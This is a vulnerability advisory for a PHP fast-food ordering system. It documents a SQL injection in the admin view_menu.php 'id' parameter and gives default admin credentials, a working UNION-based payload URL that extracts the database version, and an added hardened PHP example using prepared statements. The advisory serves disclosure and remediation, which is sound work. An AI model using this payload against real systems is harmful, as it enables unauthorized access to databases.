# SQL Injection Vulnerability in /ffos/admin/menus/view_menu.php
Vendor link: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
Software link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ffos.zip
Vulnerable file: `/ffos/admin/menus/view_menu.php`
Vulnerable parameter: `id` in `/ffos/admin/menus/view_menu.php?id=<id>`
## PoC
1. Log in to the application using the admin credentials:
- Username: admin
- Password: admin123
2. Navigate to the menu list page at:
- URL: http://localhost/ffos/admin/?page=menus
3. From the menu list, select the "Action" dropdown and click "View" to access the vulnerable endpoint (/ffos/admin/menus/view_menu.php).
4. The page loads a single menu item by its `id` parameter, for example: http://localhost/ffos/admin/menus/view_menu.php?id=1
5. Replace the value of the `id` parameter with the following payload:

   [+] Payload: `http://localhost/ffos/admin/menus/view_menu.php?id=xxx'+union+select+1,2,3,4,5,6,7,8,9,10,group_concat("result:+",version())--+-`

   The response will display the database version.
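For reference, the following is an added example of how the `id` lookup in `view_menu.php` can be written so that the payload above has no effect. It is not code from the FFOS download; the table name `menu_list`, the column names, the database credentials and the response messages are all assumptions made for the illustration.

```php
<?php
// Added example (not the project's own code): a hardened way to fetch one
// menu row by id for /ffos/admin/menus/view_menu.php. The table `menu_list`,
// its columns and the connection details below are assumptions.

// 1. Enforce the expected type at the edge. A menu id is a numeric key, so
//    anything that is not a positive integer is rejected before it reaches
//    the database. The advisory's payload ("xxx' union select ...") stops here.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid menu id.');
}

// 2. Bind the value instead of interpolating it into the SQL text. With a
//    prepared statement the id is sent as a parameter, so it can never alter
//    the structure of the query even if step 1 were missing.
$conn = new mysqli('localhost', 'ffos_user', 'CHANGE_ME', 'ffos_db'); // placeholder credentials
$conn->set_charset('utf8mb4');

$stmt = $conn->prepare(
    'SELECT id, name, description, price FROM menu_list WHERE id = ? LIMIT 1'
);
$stmt->bind_param('i', $id);
$stmt->execute();
$menu = $stmt->get_result()->fetch_assoc(); // get_result() requires the mysqlnd driver
$stmt->close();

if ($menu === null) {
    http_response_code(404);
    exit('Menu item not found.');
}

// 3. Encode on output as well, so stored data cannot inject markup into the
//    admin page when it is rendered.
foreach (['name', 'description', 'price'] as $field) {
    echo htmlspecialchars((string) $menu[$field], ENT_QUOTES, 'UTF-8'), "\n";
}
```

The integer check and the bound parameter are independent controls: the first rejects malformed input early with a clear error, the second guarantees that whatever value does reach the query is treated as data rather than SQL.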
